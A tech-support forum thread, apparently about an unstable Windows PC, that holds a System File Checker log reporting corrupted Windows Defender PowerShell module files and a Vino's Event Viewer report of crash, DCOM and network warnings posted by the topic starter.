2019-11-26 17:58:52, Info                  CSI    0000599a [SR] Beginning Verify and Repair transaction
2019-11-26 17:58:55, Info                  CSI    00005a49 [SR] Verify complete
2019-11-26 17:58:55, Info                  CSI    00005a4a [SR] Verifying 100 components
2019-11-26 17:58:55, Info                  CSI    00005a4b [SR] Beginning Verify and Repair transaction
2019-11-26 17:58:58, Info                  CSI    00005ab8 [SR] Verify complete
2019-11-26 17:58:58, Info                  CSI    00005ab9 [SR] Verifying 100 components
2019-11-26 17:58:58, Info                  CSI    00005aba [SR] Beginning Verify and Repair transaction
2019-11-26 17:59:00, Info                  CSI    00005b24 [SR] Verify complete
2019-11-26 17:59:00, Info                  CSI    00005b25 [SR] Verifying 100 components
2019-11-26 17:59:00, Info                  CSI    00005b26 [SR] Beginning Verify and Repair transaction
2019-11-26 17:59:02, Info                  CSI    00005b8b [SR] Verify complete
2019-11-26 17:59:02, Info                  CSI    00005b8c [SR] Verifying 100 components
2019-11-26 17:59:02, Info                  CSI    00005b8d [SR] Beginning Verify and Repair transaction
2019-11-26 17:59:04, Info                  CSI    00005bf4 [SR] Verify complete
2019-11-26 17:59:04, Info                  CSI    00005bf5 [SR] Verifying 100 components
2019-11-26 17:59:04, Info                  CSI    00005bf6 [SR] Beginning Verify and Repair transaction
2019-11-26 17:59:07, Info                  CSI    00005c5b [SR] Verify complete
2019-11-26 17:59:07, Info                  CSI    00005c5c [SR] Verifying 100 components
2019-11-26 17:59:07, Info                  CSI    00005c5d [SR] Beginning Verify and Repair transaction
2019-11-26 17:59:10, Info                  CSI    00005ccd [SR] Verify complete
2019-11-26 17:59:10, Info                  CSI    00005cce [SR] Verifying 100 components
2019-11-26 17:59:10, Info                  CSI    00005ccf [SR] Beginning Verify and Repair transaction
2019-11-26 17:59:12, Info                  CSI    00005d36 [SR] Verify complete
2019-11-26 17:59:13, Info                  CSI    00005d37 [SR] Verifying 100 components
2019-11-26 17:59:13, Info                  CSI    00005d38 [SR] Beginning Verify and Repair transaction
2019-11-26 17:59:15, Info                  CSI    00005d9f [SR] Verify complete
2019-11-26 17:59:15, Info                  CSI    00005da0 [SR] Verifying 100 components
2019-11-26 17:59:15, Info                  CSI    00005da1 [SR] Beginning Verify and Repair transaction
2019-11-26 17:59:17, Info                  CSI    00005e0e [SR] Verify complete
2019-11-26 17:59:17, Info                  CSI    00005e0f [SR] Verifying 100 components
2019-11-26 17:59:17, Info                  CSI    00005e10 [SR] Beginning Verify and Repair transaction
2019-11-26 17:59:19, Info                  CSI    00005e75 [SR] Verify complete
2019-11-26 17:59:20, Info                  CSI    00005e76 [SR] Verifying 100 components
2019-11-26 17:59:20, Info                  CSI    00005e77 [SR] Beginning Verify and Repair transaction
2019-11-26 17:59:22, Info                  CSI    00005ee5 [SR] Verify complete
2019-11-26 17:59:22, Info                  CSI    00005ee6 [SR] Verifying 100 components
2019-11-26 17:59:22, Info                  CSI    00005ee7 [SR] Beginning Verify and Repair transaction
2019-11-26 17:59:24, Info                  CSI    00005f53 [SR] Verify complete
2019-11-26 17:59:25, Info                  CSI    00005f54 [SR] Verifying 100 components
2019-11-26 17:59:25, Info                  CSI    00005f55 [SR] Beginning Verify and Repair transaction
2019-11-26 17:59:27, Info                  CSI    00005fba [SR] Verify complete
2019-11-26 17:59:27, Info                  CSI    00005fbb [SR] Verifying 100 components
2019-11-26 17:59:27, Info                  CSI    00005fbc [SR] Beginning Verify and Repair transaction
2019-11-26 17:59:29, Info                  CSI    00006022 [SR] Verify complete
2019-11-26 17:59:30, Info                  CSI    00006023 [SR] Verifying 100 components
2019-11-26 17:59:30, Info                  CSI    00006024 [SR] Beginning Verify and Repair transaction
2019-11-26 17:59:32, Info                  CSI    0000608b [SR] Verify complete
2019-11-26 17:59:32, Info                  CSI    0000608c [SR] Verifying 100 components
2019-11-26 17:59:32, Info                  CSI    0000608d [SR] Beginning Verify and Repair transaction
2019-11-26 17:59:34, Info                  CSI    000060f2 [SR] Verify complete
2019-11-26 17:59:34, Info                  CSI    000060f3 [SR] Verifying 100 components
2019-11-26 17:59:34, Info                  CSI    000060f4 [SR] Beginning Verify and Repair transaction
2019-11-26 17:59:39, Info                  CSI    0000617a [SR] Verify complete
2019-11-26 17:59:39, Info                  CSI    0000617b [SR] Verifying 100 components
2019-11-26 17:59:39, Info                  CSI    0000617c [SR] Beginning Verify and Repair transaction
2019-11-26 17:59:41, Info                  CSI    000061fe [SR] Verify complete
2019-11-26 17:59:42, Info                  CSI    000061ff [SR] Verifying 100 components
2019-11-26 17:59:42, Info                  CSI    00006200 [SR] Beginning Verify and Repair transaction
2019-11-26 17:59:44, Info                  CSI    00006265 [SR] Verify complete
2019-11-26 17:59:44, Info                  CSI    00006266 [SR] Verifying 100 components
2019-11-26 17:59:44, Info                  CSI    00006267 [SR] Beginning Verify and Repair transaction
2019-11-26 17:59:47, Info                  CSI    000062fc [SR] Verify complete
2019-11-26 17:59:47, Info                  CSI    000062fd [SR] Verifying 100 components
2019-11-26 17:59:47, Info                  CSI    000062fe [SR] Beginning Verify and Repair transaction
2019-11-26 17:59:50, Info                  CSI    00006363 [SR] Verify complete
2019-11-26 17:59:50, Info                  CSI    00006364 [SR] Verifying 100 components
2019-11-26 17:59:50, Info                  CSI    00006365 [SR] Beginning Verify and Repair transaction
2019-11-26 17:59:53, Info                  CSI    000063ca [SR] Verify complete
2019-11-26 17:59:53, Info                  CSI    000063cb [SR] Verifying 100 components
2019-11-26 17:59:53, Info                  CSI    000063cc [SR] Beginning Verify and Repair transaction
2019-11-26 17:59:55, Info                  CSI    0000644f [SR] Verify complete
2019-11-26 17:59:55, Info                  CSI    00006450 [SR] Verifying 100 components
2019-11-26 17:59:55, Info                  CSI    00006451 [SR] Beginning Verify and Repair transaction
2019-11-26 17:59:58, Info                  CSI    000064be [SR] Verify complete
2019-11-26 17:59:58, Info                  CSI    000064bf [SR] Verifying 100 components
2019-11-26 17:59:58, Info                  CSI    000064c0 [SR] Beginning Verify and Repair transaction
2019-11-26 18:00:00, Info                  CSI    00006527 [SR] Verify complete
2019-11-26 18:00:00, Info                  CSI    00006528 [SR] Verifying 100 components
2019-11-26 18:00:00, Info                  CSI    00006529 [SR] Beginning Verify and Repair transaction
2019-11-26 18:00:02, Info                  CSI    0000658e [SR] Verify complete
2019-11-26 18:00:02, Info                  CSI    0000658f [SR] Verifying 100 components
2019-11-26 18:00:02, Info                  CSI    00006590 [SR] Beginning Verify and Repair transaction
2019-11-26 18:00:04, Info                  CSI    000065f5 [SR] Verify complete
2019-11-26 18:00:04, Info                  CSI    000065f6 [SR] Verifying 100 components
2019-11-26 18:00:04, Info                  CSI    000065f7 [SR] Beginning Verify and Repair transaction
2019-11-26 18:00:06, Info                  CSI    0000665c [SR] Verify complete
2019-11-26 18:00:06, Info                  CSI    0000665d [SR] Verifying 100 components
2019-11-26 18:00:06, Info                  CSI    0000665e [SR] Beginning Verify and Repair transaction
2019-11-26 18:00:08, Info                  CSI    000066c3 [SR] Verify complete
2019-11-26 18:00:09, Info                  CSI    000066c4 [SR] Verifying 100 components
2019-11-26 18:00:09, Info                  CSI    000066c5 [SR] Beginning Verify and Repair transaction
2019-11-26 18:00:11, Info                  CSI    0000672a [SR] Verify complete
2019-11-26 18:00:11, Info                  CSI    0000672b [SR] Verifying 100 components
2019-11-26 18:00:11, Info                  CSI    0000672c [SR] Beginning Verify and Repair transaction
2019-11-26 18:00:13, Info                  CSI    00006791 [SR] Verify complete
2019-11-26 18:00:13, Info                  CSI    00006792 [SR] Verifying 100 components
2019-11-26 18:00:13, Info                  CSI    00006793 [SR] Beginning Verify and Repair transaction
2019-11-26 18:00:15, Info                  CSI    000067f8 [SR] Verify complete
2019-11-26 18:00:15, Info                  CSI    000067f9 [SR] Verifying 12 components
2019-11-26 18:00:15, Info                  CSI    000067fa [SR] Beginning Verify and Repair transaction
2019-11-26 18:00:16, Info                  CSI    00006807 [SR] Verify complete
2019-11-26 18:00:16, Info                  CSI    00006808 [SR] Repairing 2 components
2019-11-26 18:00:16, Info                  CSI    00006809 [SR] Beginning Verify and Repair transaction
2019-11-26 18:00:16, Info                  CSI    0000680b [SR] Cannot repair member file [l:26]'MSFT_MpThreatCatalog.cdxml' of Windows-Defender-Management-Powershell, version 10.0.17134.1, arch amd64, nonSxS, pkt {l:8 b:31bf3856ad364e35} in the store, hash mismatch
2019-11-26 18:00:16, Info                  CSI    0000680d [SR] Cannot repair member file [l:13]'Defender.psd1' of Windows-Defender-Management-Powershell, version 10.0.17134.1, arch amd64, nonSxS, pkt {l:8 b:31bf3856ad364e35} in the store, hash mismatch
2019-11-26 18:00:16, Info                  CSI    0000680f [SR] Cannot repair member file [l:20]'MSFT_MpWDOScan.cdxml' of Windows-Defender-Management-Powershell, version 10.0.17134.1, arch amd64, nonSxS, pkt {l:8 b:31bf3856ad364e35} in the store, hash mismatch
2019-11-26 18:00:16, Info                  CSI    00006811 [SR] Cannot repair member file [l:22]'MSFT_MpSignature.cdxml' of Windows-Defender-Management-Powershell, version 10.0.17134.1, arch amd64, nonSxS, pkt {l:8 b:31bf3856ad364e35} in the store, hash mismatch
2019-11-26 18:00:16, Info                  CSI    00006813 [SR] Cannot repair member file [l:19]'MSFT_MpThreat.cdxml' of Windows-Defender-Management-Powershell, version 10.0.17134.1, arch amd64, nonSxS, pkt {l:8 b:31bf3856ad364e35} in the store, hash mismatch
2019-11-26 18:00:16, Info                  CSI    00006815 [SR] Cannot repair member file [l:27]'MSFT_MpComputerStatus.cdxml' of Windows-Defender-Management-Powershell, version 10.0.17134.1, arch amd64, nonSxS, pkt {l:8 b:31bf3856ad364e35} in the store, hash mismatch
2019-11-26 18:00:16, Info                  CSI    00006817 [SR] Cannot repair member file [l:17]'MSFT_MpScan.cdxml' of Windows-Defender-Management-Powershell, version 10.0.17134.1, arch amd64, nonSxS, pkt {l:8 b:31bf3856ad364e35} in the store, hash mismatch
2019-11-26 18:00:16, Info                  CSI    00006819 [SR] Cannot repair member file [l:28]'MSFT_MpThreatDetection.cdxml' of Windows-Defender-Management-Powershell, version 10.0.17134.1, arch amd64, nonSxS, pkt {l:8 b:31bf3856ad364e35} in the store, hash mismatch
2019-11-26 18:00:16, Info                  CSI    0000681b [SR] Cannot repair member file [l:23]'MSFT_MpPreference.cdxml' of Windows-Defender-Management-Powershell, version 10.0.17134.1, arch amd64, nonSxS, pkt {l:8 b:31bf3856ad364e35} in the store, hash mismatch
2019-11-26 18:00:16, Info                  CSI    0000681d [SR] Cannot repair member file [l:12]'OneDrive.lnk' of Microsoft-Windows-OneDrive-Setup, version 10.0.17134.1, arch Host= amd64 Guest= x86, nonSxS, pkt {l:8 b:31bf3856ad364e35} in the store, hash mismatch
2019-11-26 18:00:16, Info                  CSI    00006820 [SR] Cannot repair member file [l:26]'MSFT_MpThreatCatalog.cdxml' of Windows-Defender-Management-Powershell, version 10.0.17134.1, arch amd64, nonSxS, pkt {l:8 b:31bf3856ad364e35} in the store, hash mismatch
2019-11-26 18:00:16, Info                  CSI    00006821 [SR] This component was referenced by [l:122]'Windows-Defender-Management-Powershell-Group-Package~31bf3856ad364e35~amd64~~10.0.17134.1.19d7e6e595ade1abc2bd0ca651b4908a'
2019-11-26 18:00:16, Info                  CSI    00006823 [SR] Cannot repair member file [l:13]'Defender.psd1' of Windows-Defender-Management-Powershell, version 10.0.17134.1, arch amd64, nonSxS, pkt {l:8 b:31bf3856ad364e35} in the store, hash mismatch
2019-11-26 18:00:16, Info                  CSI    00006824 [SR] This component was referenced by [l:122]'Windows-Defender-Management-Powershell-Group-Package~31bf3856ad364e35~amd64~~10.0.17134.1.19d7e6e595ade1abc2bd0ca651b4908a'
2019-11-26 18:00:16, Info                  CSI    00006826 [SR] Cannot repair member file [l:20]'MSFT_MpWDOScan.cdxml' of Windows-Defender-Management-Powershell, version 10.0.17134.1, arch amd64, nonSxS, pkt {l:8 b:31bf3856ad364e35} in the store, hash mismatch
2019-11-26 18:00:16, Info                  CSI    00006827 [SR] This component was referenced by [l:122]'Windows-Defender-Management-Powershell-Group-Package~31bf3856ad364e35~amd64~~10.0.17134.1.19d7e6e595ade1abc2bd0ca651b4908a'
2019-11-26 18:00:16, Info                  CSI    00006829 [SR] Cannot repair member file [l:22]'MSFT_MpSignature.cdxml' of Windows-Defender-Management-Powershell, version 10.0.17134.1, arch amd64, nonSxS, pkt {l:8 b:31bf3856ad364e35} in the store, hash mismatch
2019-11-26 18:00:16, Info                  CSI    0000682a [SR] This component was referenced by [l:122]'Windows-Defender-Management-Powershell-Group-Package~31bf3856ad364e35~amd64~~10.0.17134.1.19d7e6e595ade1abc2bd0ca651b4908a'
2019-11-26 18:00:16, Info                  CSI    0000682c [SR] Cannot repair member file [l:19]'MSFT_MpThreat.cdxml' of Windows-Defender-Management-Powershell, version 10.0.17134.1, arch amd64, nonSxS, pkt {l:8 b:31bf3856ad364e35} in the store, hash mismatch
2019-11-26 18:00:16, Info                  CSI    0000682d [SR] This component was referenced by [l:122]'Windows-Defender-Management-Powershell-Group-Package~31bf3856ad364e35~amd64~~10.0.17134.1.19d7e6e595ade1abc2bd0ca651b4908a'
2019-11-26 18:00:16, Info                  CSI    0000682f [SR] Cannot repair member file [l:27]'MSFT_MpComputerStatus.cdxml' of Windows-Defender-Management-Powershell, version 10.0.17134.1, arch amd64, nonSxS, pkt {l:8 b:31bf3856ad364e35} in the store, hash mismatch
2019-11-26 18:00:16, Info                  CSI    00006830 [SR] This component was referenced by [l:122]'Windows-Defender-Management-Powershell-Group-Package~31bf3856ad364e35~amd64~~10.0.17134.1.19d7e6e595ade1abc2bd0ca651b4908a'
2019-11-26 18:00:16, Info                  CSI    00006832 [SR] Cannot repair member file [l:17]'MSFT_MpScan.cdxml' of Windows-Defender-Management-Powershell, version 10.0.17134.1, arch amd64, nonSxS, pkt {l:8 b:31bf3856ad364e35} in the store, hash mismatch
2019-11-26 18:00:16, Info                  CSI    00006833 [SR] This component was referenced by [l:122]'Windows-Defender-Management-Powershell-Group-Package~31bf3856ad364e35~amd64~~10.0.17134.1.19d7e6e595ade1abc2bd0ca651b4908a'
2019-11-26 18:00:16, Info                  CSI    00006835 [SR] Cannot repair member file [l:28]'MSFT_MpThreatDetection.cdxml' of Windows-Defender-Management-Powershell, version 10.0.17134.1, arch amd64, nonSxS, pkt {l:8 b:31bf3856ad364e35} in the store, hash mismatch
2019-11-26 18:00:16, Info                  CSI    00006836 [SR] This component was referenced by [l:122]'Windows-Defender-Management-Powershell-Group-Package~31bf3856ad364e35~amd64~~10.0.17134.1.19d7e6e595ade1abc2bd0ca651b4908a'
2019-11-26 18:00:16, Info                  CSI    00006838 [SR] Cannot repair member file [l:23]'MSFT_MpPreference.cdxml' of Windows-Defender-Management-Powershell, version 10.0.17134.1, arch amd64, nonSxS, pkt {l:8 b:31bf3856ad364e35} in the store, hash mismatch
2019-11-26 18:00:16, Info                  CSI    00006839 [SR] This component was referenced by [l:122]'Windows-Defender-Management-Powershell-Group-Package~31bf3856ad364e35~amd64~~10.0.17134.1.19d7e6e595ade1abc2bd0ca651b4908a'
2019-11-26 18:00:16, Info                  CSI    0000683c [SR] Could not reproject corrupted file \??\C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Defender\\MSFT_MpComputerStatus.cdxml; source file in store is also corrupted
2019-11-26 18:00:16, Info                  CSI    0000683f [SR] Could not reproject corrupted file \??\C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Defender\\MSFT_MpThreat.cdxml; source file in store is also corrupted
2019-11-26 18:00:16, Info                  CSI    00006842 [SR] Could not reproject corrupted file \??\C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Defender\\MSFT_MpThreatCatalog.cdxml; source file in store is also corrupted
2019-11-26 18:00:16, Info                  CSI    00006845 [SR] Could not reproject corrupted file \??\C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Defender\\MSFT_MpThreatDetection.cdxml; source file in store is also corrupted
2019-11-26 18:00:16, Info                  CSI    00006848 [SR] Could not reproject corrupted file \??\C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Defender\\MSFT_MpPreference.cdxml; source file in store is also corrupted
2019-11-26 18:00:16, Info                  CSI    0000684b [SR] Could not reproject corrupted file \??\C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Defender\\MSFT_MpScan.cdxml; source file in store is also corrupted
2019-11-26 18:00:16, Info                  CSI    0000684e [SR] Could not reproject corrupted file \??\C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Defender\\MSFT_MpWDOScan.cdxml; source file in store is also corrupted
2019-11-26 18:00:16, Info                  CSI    00006851 [SR] Could not reproject corrupted file \??\C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Defender\\MSFT_MpSignature.cdxml; source file in store is also corrupted
2019-11-26 18:00:16, Info                  CSI    00006854 [SR] Could not reproject corrupted file \??\C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Defender\\Defender.psd1; source file in store is also corrupted
2019-11-26 18:00:16, Info                  CSI    00006858 [SR] Cannot repair member file [l:12]'OneDrive.lnk' of Microsoft-Windows-OneDrive-Setup, version 10.0.17134.1, arch Host= amd64 Guest= x86, nonSxS, pkt {l:8 b:31bf3856ad364e35} in the store, hash mismatch
2019-11-26 18:00:16, Info                  CSI    00006859 [SR] This component was referenced by [l:116]'Microsoft-Windows-OneDrive-Setup-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.f647690e04ff7e43581b577deaab5f78'
2019-11-26 18:00:16, Info                  CSI    0000685b [SR] Could not reproject corrupted file \??\C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\\OneDrive.lnk; source file in store is also corrupted
2019-11-26 18:00:16, Info                  CSI    0000685d [SR] Repair complete
2019-11-26 18:00:16, Info                  CSI    0000685e [SR] Committing transaction
2019-11-26 18:00:16, Info                  CSI    00006863 [SR] Verify and Repair Transaction completed. All files and registry keys listed in this transaction  have been successfully repaired
 



#13
spra

  • Topic Starter
  • 78 posts

First result by VEW:

 

Vino's Event Viewer v01c run on Windows 7 in English
Report run at 26/11/2019 18:06:14

Note: All dates below are in the format dd/mm/yyyy

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
'System' Log - Critical Type
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Log: 'System' Date/Time: 26/11/2019 11:49:39
Type: Critical Category: 63
Event: 41 Source: Microsoft-Windows-Kernel-Power
The system has rebooted without cleanly shutting down first. This error could be caused if the system stopped responding, crashed, or lost power unexpectedly.

Log: 'System' Date/Time: 26/11/2019 11:39:13
Type: Critical Category: 63
Event: 41 Source: Microsoft-Windows-Kernel-Power
The system has rebooted without cleanly shutting down first. This error could be caused if the system stopped responding, crashed, or lost power unexpectedly.

Log: 'System' Date/Time: 25/11/2019 16:39:44
Type: Critical Category: 63
Event: 41 Source: Microsoft-Windows-Kernel-Power
The system has rebooted without cleanly shutting down first. This error could be caused if the system stopped responding, crashed, or lost power unexpectedly.

Log: 'System' Date/Time: 25/11/2019 10:53:43
Type: Critical Category: 63
Event: 41 Source: Microsoft-Windows-Kernel-Power
The system has rebooted without cleanly shutting down first. This error could be caused if the system stopped responding, crashed, or lost power unexpectedly.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
'System' Log - Error Type
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Log: 'System' Date/Time: 26/11/2019 15:50:09
Type: Error Category: 0
Event: 10016 Source: Microsoft-Windows-DistributedCOM
The application-specific permission settings do not grant Local Launch permission for the COM Server application with CLSID  Windows.SecurityCenter.WscDataProtection  and APPID  Unavailable  to the user NT AUTHORITY\SYSTEM SID (S-1-5-18) from address LocalHost (Using LRPC) running in the application container Unavailable SID (Unavailable). This security permission can be modified using the Component Services administrative tool.

Log: 'System' Date/Time: 26/11/2019 15:50:09
Type: Error Category: 0
Event: 10016 Source: Microsoft-Windows-DistributedCOM
The application-specific permission settings do not grant Local Launch permission for the COM Server application with CLSID  Windows.SecurityCenter.WscBrokerManager  and APPID  Unavailable  to the user NT AUTHORITY\SYSTEM SID (S-1-5-18) from address LocalHost (Using LRPC) running in the application container Unavailable SID (Unavailable). This security permission can be modified using the Component Services administrative tool.

Log: 'System' Date/Time: 26/11/2019 15:48:09
Type: Error Category: 0
Event: 10016 Source: Microsoft-Windows-DistributedCOM
The application-specific permission settings do not grant Local Activation permission for the COM Server application with CLSID  {D63B10C5-BB46-4990-A94F-E40B9D520160}  and APPID  {9CA88EE3-ACB7-47C8-AFC4-AB702511C276}  to the user NT AUTHORITY\NETWORK SERVICE SID (S-1-5-20) from address LocalHost (Using LRPC) running in the application container Unavailable SID (Unavailable). This security permission can be modified using the Component Services administrative tool.

Log: 'System' Date/Time: 26/11/2019 15:47:39
Type: Error Category: 0
Event: 10010 Source: Microsoft-Windows-DistributedCOM
The server {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} did not register with DCOM within the required timeout.

Log: 'System' Date/Time: 26/11/2019 15:47:39
Type: Error Category: 0
Event: 10010 Source: Microsoft-Windows-DistributedCOM
The server {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} did not register with DCOM within the required timeout.

Log: 'System' Date/Time: 26/11/2019 15:47:39
Type: Error Category: 0
Event: 10010 Source: Microsoft-Windows-DistributedCOM
The server {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} did not register with DCOM within the required timeout.

Log: 'System' Date/Time: 26/11/2019 15:47:39
Type: Error Category: 0
Event: 10010 Source: Microsoft-Windows-DistributedCOM
The server {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} did not register with DCOM within the required timeout.

Log: 'System' Date/Time: 26/11/2019 11:51:48
Type: Error Category: 0
Event: 10016 Source: Microsoft-Windows-DistributedCOM
The application-specific permission settings do not grant Local Launch permission for the COM Server application with CLSID  Windows.SecurityCenter.WscDataProtection  and APPID  Unavailable  to the user NT AUTHORITY\SYSTEM SID (S-1-5-18) from address LocalHost (Using LRPC) running in the application container Unavailable SID (Unavailable). This security permission can be modified using the Component Services administrative tool.

Log: 'System' Date/Time: 26/11/2019 11:51:48
Type: Error Category: 0
Event: 10016 Source: Microsoft-Windows-DistributedCOM
The application-specific permission settings do not grant Local Launch permission for the COM Server application with CLSID  Windows.SecurityCenter.WscBrokerManager  and APPID  Unavailable  to the user NT AUTHORITY\SYSTEM SID (S-1-5-18) from address LocalHost (Using LRPC) running in the application container Unavailable SID (Unavailable). This security permission can be modified using the Component Services administrative tool.

Log: 'System' Date/Time: 26/11/2019 11:41:22
Type: Error Category: 0
Event: 10016 Source: Microsoft-Windows-DistributedCOM
The application-specific permission settings do not grant Local Launch permission for the COM Server application with CLSID  Windows.SecurityCenter.WscDataProtection  and APPID  Unavailable  to the user NT AUTHORITY\SYSTEM SID (S-1-5-18) from address LocalHost (Using LRPC) running in the application container Unavailable SID (Unavailable). This security permission can be modified using the Component Services administrative tool.

Log: 'System' Date/Time: 26/11/2019 11:41:22
Type: Error Category: 0
Event: 10016 Source: Microsoft-Windows-DistributedCOM
The application-specific permission settings do not grant Local Launch permission for the COM Server application with CLSID  Windows.SecurityCenter.WscBrokerManager  and APPID  Unavailable  to the user NT AUTHORITY\SYSTEM SID (S-1-5-18) from address LocalHost (Using LRPC) running in the application container Unavailable SID (Unavailable). This security permission can be modified using the Component Services administrative tool.

Log: 'System' Date/Time: 26/11/2019 11:38:55
Type: Error Category: 0
Event: 10010 Source: Microsoft-Windows-DistributedCOM
The server {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} did not register with DCOM within the required timeout.

Log: 'System' Date/Time: 26/11/2019 11:38:55
Type: Error Category: 0
Event: 10010 Source: Microsoft-Windows-DistributedCOM
The server {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} did not register with DCOM within the required timeout.

Log: 'System' Date/Time: 26/11/2019 11:38:55
Type: Error Category: 0
Event: 10010 Source: Microsoft-Windows-DistributedCOM
The server {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} did not register with DCOM within the required timeout.

Log: 'System' Date/Time: 25/11/2019 21:47:47
Type: Error Category: 0
Event: 10010 Source: Microsoft-Windows-DistributedCOM
The server {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} did not register with DCOM within the required timeout.

Log: 'System' Date/Time: 25/11/2019 21:47:47
Type: Error Category: 0
Event: 10010 Source: Microsoft-Windows-DistributedCOM
The server {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} did not register with DCOM within the required timeout.

Log: 'System' Date/Time: 25/11/2019 21:47:47
Type: Error Category: 0
Event: 10010 Source: Microsoft-Windows-DistributedCOM
The server {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} did not register with DCOM within the required timeout.

Log: 'System' Date/Time: 25/11/2019 21:47:46
Type: Error Category: 0
Event: 10010 Source: Microsoft-Windows-DistributedCOM
The server {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} did not register with DCOM within the required timeout.

Log: 'System' Date/Time: 25/11/2019 19:24:04
Type: Error Category: 0
Event: 10016 Source: Microsoft-Windows-DistributedCOM
The application-specific permission settings do not grant Local Launch permission for the COM Server application with CLSID  Windows.SecurityCenter.WscDataProtection  and APPID  Unavailable  to the user NT AUTHORITY\SYSTEM SID (S-1-5-18) from address LocalHost (Using LRPC) running in the application container Unavailable SID (Unavailable). This security permission can be modified using the Component Services administrative tool.

Log: 'System' Date/Time: 25/11/2019 19:24:04
Type: Error Category: 0
Event: 10016 Source: Microsoft-Windows-DistributedCOM
The application-specific permission settings do not grant Local Launch permission for the COM Server application with CLSID  Windows.SecurityCenter.WscBrokerManager  and APPID  Unavailable  to the user NT AUTHORITY\SYSTEM SID (S-1-5-18) from address LocalHost (Using LRPC) running in the application container Unavailable SID (Unavailable). This security permission can be modified using the Component Services administrative tool.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
'System' Log - Warning Type
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Log: 'System' Date/Time: 26/11/2019 15:49:13
Type: Warning Category: 0
Event: 8021 Source: BROWSER
The browser service was unable to retrieve a list of servers from the browser master \\MIXPC on the network \Device\NetBT_Tcpip_{2A8E95F9-250A-4CDC-8D08-F661E3F2A913}.    Browser master: \\MIXPC  Network: \Device\NetBT_Tcpip_{2A8E95F9-250A-4CDC-8D08-F661E3F2A913}    This event may be caused by a temporary loss of network connectivity. If this message appears again, verify that the server is still connected to the network. The return code is in the Data text box.

Log: 'System' Date/Time: 26/11/2019 15:48:15
Type: Warning Category: 0
Event: 11 Source: Microsoft-Windows-Wininit
Custom dynamic link libraries are being loaded for every application. The system administrator should review the list of libraries to ensure they are related to trusted applications. Please visit http://support.microsoft.com/kb/197571for more information.

Log: 'System' Date/Time: 26/11/2019 11:51:31
Type: Warning Category: 0
Event: 8021 Source: BROWSER
The browser service was unable to retrieve a list of servers from the browser master \\MIXPC on the network \Device\NetBT_Tcpip_{2A8E95F9-250A-4CDC-8D08-F661E3F2A913}.    Browser master: \\MIXPC  Network: \Device\NetBT_Tcpip_{2A8E95F9-250A-4CDC-8D08-F661E3F2A913}    This event may be caused by a temporary loss of network connectivity. If this message appears again, verify that the server is still connected to the network. The return code is in the Data text box.

Log: 'System' Date/Time: 26/11/2019 11:49:54
Type: Warning Category: 0
Event: 11 Source: Microsoft-Windows-Wininit
Custom dynamic link libraries are being loaded for every application. The system administrator should review the list of libraries to ensure they are related to trusted applications. Please visit http://support.microsoft.com/kb/197571for more information.

Log: 'System' Date/Time: 26/11/2019 11:40:41
Type: Warning Category: 0
Event: 8021 Source: BROWSER
The browser service was unable to retrieve a list of servers from the browser master \\MIXPC on the network \Device\NetBT_Tcpip_{2A8E95F9-250A-4CDC-8D08-F661E3F2A913}.    Browser master: \\MIXPC  Network: \Device\NetBT_Tcpip_{2A8E95F9-250A-4CDC-8D08-F661E3F2A913}    This event may be caused by a temporary loss of network connectivity. If this message appears again, verify that the server is still connected to the network. The return code is in the Data text box.

Log: 'System' Date/Time: 26/11/2019 11:39:28
Type: Warning Category: 0
Event: 11 Source: Microsoft-Windows-Wininit
Custom dynamic link libraries are being loaded for every application. The system administrator should review the list of libraries to ensure they are related to trusted applications. Please visit http://support.microsoft.com/kb/197571for more information.

Log: 'System' Date/Time: 26/11/2019 07:40:05
Type: Warning Category: 0
Event: 8021 Source: BROWSER
The browser service was unable to retrieve a list of servers from the browser master \\MIXPC on the network \Device\NetBT_Tcpip_{2A8E95F9-250A-4CDC-8D08-F661E3F2A913}.    Browser master: \\MIXPC  Network: \Device\NetBT_Tcpip_{2A8E95F9-250A-4CDC-8D08-F661E3F2A913}    This event may be caused by a temporary loss of network connectivity. If this message appears again, verify that the server is still connected to the network. The return code is in the Data text box.

Log: 'System' Date/Time: 25/11/2019 19:38:40
Type: Warning Category: 0
Event: 8021 Source: BROWSER
The browser service was unable to retrieve a list of servers from the browser master \\DESKTOP-VV6LMNU on the network \Device\NetBT_Tcpip_{2A8E95F9-250A-4CDC-8D08-F661E3F2A913}.    Browser master: \\DESKTOP-VV6LMNU  Network: \Device\NetBT_Tcpip_{2A8E95F9-250A-4CDC-8D08-F661E3F2A913}    This event may be caused by a temporary loss of network connectivity. If this message appears again, verify that the server is still connected to the network. The return code is in the Data text box.

Log: 'System' Date/Time: 25/11/2019 19:22:09
Type: Warning Category: 0
Event: 11 Source: Microsoft-Windows-Wininit
Custom dynamic link libraries are being loaded for every application. The system administrator should review the list of libraries to ensure they are related to trusted applications. Please visit http://support.microsoft.com/kb/197571for more information.

Log: 'System' Date/Time: 25/11/2019 19:18:34
Type: Warning Category: 1014
Event: 1014 Source: Microsoft-Windows-DNS-Client
Name resolution for the name detectportal.firefox.com timed out after none of the configured DNS servers responded.

